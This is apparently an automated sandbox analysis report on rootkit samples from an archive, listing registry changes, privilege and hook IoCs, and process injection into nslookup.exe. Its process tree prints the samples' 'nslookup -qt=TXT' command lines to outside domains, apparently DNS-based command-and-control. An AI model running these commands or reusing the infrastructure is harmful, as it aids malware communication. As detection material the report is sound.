Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe
Key created	\REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe
Key created	\REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pid	process
1104	40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe
1104	40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe
2200	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe
2200	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe
1676	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
1676	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
3904	757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
3904	757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
3208	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe
2336	cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe
3208	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe
2336	cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe

Suspicious behavior: LoadsDriver 12 IoCs

Processes:

pid process

644
644
644
644
644
644
644
644
644
644
644
644

pid	process
644
644
644
644
644
644
644
644
644
644
644
644

Suspicious use of AdjustPrivilegeToken 14 IoCs

Processes:

40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exebf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.execf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.execc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.execc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exebf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.execf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.execc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.execc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe

description	pid	process
Token: SeDebugPrivilege	1104	40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe
Token: SeDebugPrivilege	2200	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe
Token: SeDebugPrivilege	1676	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
Token: SeDebugPrivilege	3904	757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
Token: SeDebugPrivilege	3208	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe
Token: SeDebugPrivilege	2336	cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe
Token: SeDebugPrivilege	4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
Token: SeDebugPrivilege	1104	40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe
Token: SeDebugPrivilege	2200	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe
Token: SeDebugPrivilege	1676	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
Token: SeDebugPrivilege	3904	757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
Token: SeDebugPrivilege	3208	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe
Token: SeDebugPrivilege	2336	cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe
Token: SeDebugPrivilege	4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe

Suspicious use of SetWindowsHookEx 42 IoCs

Processes:

cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exebf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.execc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.execc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exeb1e3da936d666cf9d671dd8f79e54afc8f524bccaca77e835bf611ec3038211c.execf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exebf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.execc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.execc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exeb1e3da936d666cf9d671dd8f79e54afc8f524bccaca77e835bf611ec3038211c.exe

pid	process
3208	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe
1676	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
1104	40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe
3904	757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
2200	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe
2336	cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe
3208	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe
3208	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe
1676	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
1676	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
3904	757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
3904	757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
1104	40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe
1104	40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe
2336	cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe
2336	cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe
2200	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe
2200	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
3748	b1e3da936d666cf9d671dd8f79e54afc8f524bccaca77e835bf611ec3038211c.exe
3748	b1e3da936d666cf9d671dd8f79e54afc8f524bccaca77e835bf611ec3038211c.exe
3208	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe
1676	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
1104	40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe
3904	757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
2200	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe
2336	cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe
3208	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe
3208	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe
1676	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
1676	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
3904	757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
3904	757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
1104	40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe
1104	40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe
2336	cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe
2336	cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe
2200	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe
2200	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe
4676	cc4864a25a305759921b73d753116873493f2c526a396839d4da6815492299d8.exe
3748	b1e3da936d666cf9d671dd8f79e54afc8f524bccaca77e835bf611ec3038211c.exe
3748	b1e3da936d666cf9d671dd8f79e54afc8f524bccaca77e835bf611ec3038211c.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exebf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.execf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.execc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exebf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.execf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.execc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe

description	pid	process	target process
PID 1104 wrote to memory of 3188	1104	40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe	nslookup.exe
PID 1104 wrote to memory of 3188	1104	40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe	nslookup.exe
PID 1104 wrote to memory of 3188	1104	40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe	nslookup.exe
PID 2200 wrote to memory of 4376	2200	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe	nslookup.exe
PID 2200 wrote to memory of 4376	2200	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe	nslookup.exe
PID 2200 wrote to memory of 4376	2200	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe	nslookup.exe
PID 2200 wrote to memory of 4756	2200	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe	nslookup.exe
PID 2200 wrote to memory of 4756	2200	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe	nslookup.exe
PID 2200 wrote to memory of 4756	2200	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe	nslookup.exe
PID 1676 wrote to memory of 3380	1676	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe	nslookup.exe
PID 1676 wrote to memory of 3380	1676	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe	nslookup.exe
PID 1676 wrote to memory of 3380	1676	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe	nslookup.exe
PID 1676 wrote to memory of 4140	1676	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe	nslookup.exe
PID 1676 wrote to memory of 4140	1676	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe	nslookup.exe
PID 1676 wrote to memory of 4140	1676	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe	nslookup.exe
PID 3904 wrote to memory of 1816	3904	757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe	nslookup.exe
PID 3904 wrote to memory of 1816	3904	757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe	nslookup.exe
PID 3904 wrote to memory of 1816	3904	757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe	nslookup.exe
PID 3208 wrote to memory of 3024	3208	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe	nslookup.exe
PID 3208 wrote to memory of 3024	3208	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe	nslookup.exe
PID 3208 wrote to memory of 3024	3208	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe	nslookup.exe
PID 3208 wrote to memory of 2000	3208	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe	nslookup.exe
PID 3208 wrote to memory of 2000	3208	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe	nslookup.exe
PID 3208 wrote to memory of 2000	3208	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe	nslookup.exe
PID 2336 wrote to memory of 232	2336	cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe	nslookup.exe
PID 2336 wrote to memory of 232	2336	cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe	nslookup.exe
PID 2336 wrote to memory of 232	2336	cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe	nslookup.exe
PID 2200 wrote to memory of 3976	2200	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe	nslookup.exe
PID 2200 wrote to memory of 3976	2200	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe	nslookup.exe
PID 2200 wrote to memory of 3976	2200	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe	nslookup.exe
PID 1676 wrote to memory of 1364	1676	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe	nslookup.exe
PID 1676 wrote to memory of 1364	1676	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe	nslookup.exe
PID 1676 wrote to memory of 1364	1676	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe	nslookup.exe
PID 3208 wrote to memory of 4912	3208	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe	nslookup.exe
PID 3208 wrote to memory of 4912	3208	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe	nslookup.exe
PID 3208 wrote to memory of 4912	3208	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe	nslookup.exe
PID 1104 wrote to memory of 3188	1104	40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe	nslookup.exe
PID 1104 wrote to memory of 3188	1104	40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe	nslookup.exe
PID 1104 wrote to memory of 3188	1104	40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe	nslookup.exe
PID 2200 wrote to memory of 4376	2200	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe	nslookup.exe
PID 2200 wrote to memory of 4376	2200	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe	nslookup.exe
PID 2200 wrote to memory of 4376	2200	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe	nslookup.exe
PID 2200 wrote to memory of 4756	2200	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe	nslookup.exe
PID 2200 wrote to memory of 4756	2200	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe	nslookup.exe
PID 2200 wrote to memory of 4756	2200	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe	nslookup.exe
PID 1676 wrote to memory of 3380	1676	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe	nslookup.exe
PID 1676 wrote to memory of 3380	1676	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe	nslookup.exe
PID 1676 wrote to memory of 3380	1676	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe	nslookup.exe
PID 1676 wrote to memory of 4140	1676	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe	nslookup.exe
PID 1676 wrote to memory of 4140	1676	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe	nslookup.exe
PID 1676 wrote to memory of 4140	1676	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe	nslookup.exe
PID 3904 wrote to memory of 1816	3904	757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe	nslookup.exe
PID 3904 wrote to memory of 1816	3904	757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe	nslookup.exe
PID 3904 wrote to memory of 1816	3904	757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe	nslookup.exe
PID 3208 wrote to memory of 3024	3208	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe	nslookup.exe
PID 3208 wrote to memory of 3024	3208	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe	nslookup.exe
PID 3208 wrote to memory of 3024	3208	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe	nslookup.exe
PID 3208 wrote to memory of 2000	3208	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe	nslookup.exe
PID 3208 wrote to memory of 2000	3208	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe	nslookup.exe
PID 3208 wrote to memory of 2000	3208	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe	nslookup.exe
PID 2336 wrote to memory of 232	2336	cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe	nslookup.exe
PID 2336 wrote to memory of 232	2336	cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe	nslookup.exe
PID 2336 wrote to memory of 232	2336	cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe	nslookup.exe
PID 2200 wrote to memory of 3976	2200	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe	nslookup.exe

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\Rootkits & Bootkits.zip"
1⤵
PID:2140

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2752

C:\Users\Admin\Desktop\Rootkits\cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe
"C:\Users\Admin\Desktop\Rootkits\cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe"
1⤵
- Enumerates connected drives
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3208

C:\Windows\SysWOW64\nslookup.exe
nslookup -qt=TXT 4795aefc17.bbyyjy.com 114.114.114.114
2⤵
PID:2000

C:\Windows\SysWOW64\nslookup.exe
nslookup -qt=TXT mxgmxbbyxb.bbyyjy.com 114.114.114.114
2⤵
PID:3024

C:\Windows\SysWOW64\nslookup.exe
nslookup -qt=TXT 9c15224a8228b9a9.huodu.xyz 114.114.114.114
2⤵
PID:4912

C:\Users\Admin\Desktop\Rootkits\0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
"C:\Users\Admin\Desktop\Rootkits\0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe"
1⤵
- Enumerates connected drives
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1676

C:\Windows\SysWOW64\nslookup.exe
nslookup -qt=TXT 4795aefc17.bbyyjy.com 114.114.114.114
2⤵
PID:4140

C:\Windows\SysWOW64\nslookup.exe
nslookup -qt=TXT mxgmxbbyxb.bbyyjy.com 114.114.114.114
2⤵
PID:3380

C:\Windows\SysWOW64\nslookup.exe
nslookup -qt=TXT 9c15224a8228b9a9.huodu.xyz 114.114.114.114
2⤵
PID:1364

C:\Users\Admin\Desktop\Rootkits\40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe
"C:\Users\Admin\Desktop\Rootkits\40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe"
1⤵
- Enumerates connected drives
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1104

C:\Windows\SysWOW64\nslookup.exe
nslookup -qt=TXT mxgmxbbyxb.bbyyjy.com 114.114.114.114
2⤵
PID:3188

C:\Users\Admin\Desktop\Rootkits\757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
"C:\Users\Admin\Desktop\Rootkits\757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe"
1⤵
- Enumerates connected drives
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3904

C:\Windows\SysWOW64\nslookup.exe
nslookup -qt=TXT mxgmxbbyxb.bbyyjy.com 114.114.114.114
2⤵
PID:1816

C:\Users\Admin\Desktop\Rootkits\cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe
"C:\Users\Admin\Desktop\Rootkits\cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe"
1⤵
- Enumerates connected drives
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2336

C:\Windows\SysWOW64\nslookup.exe
nslookup -qt=TXT mxgmxbbyxb.bbyyjy.com 114.114.114.114
2⤵
PID:232

C:\Users\Admin\Desktop\Rootkits\bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe
"C:\Users\Admin\Desktop\Rootkits\bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe"
1⤵
- Enumerates connected drives
- Enumerates system info in registry
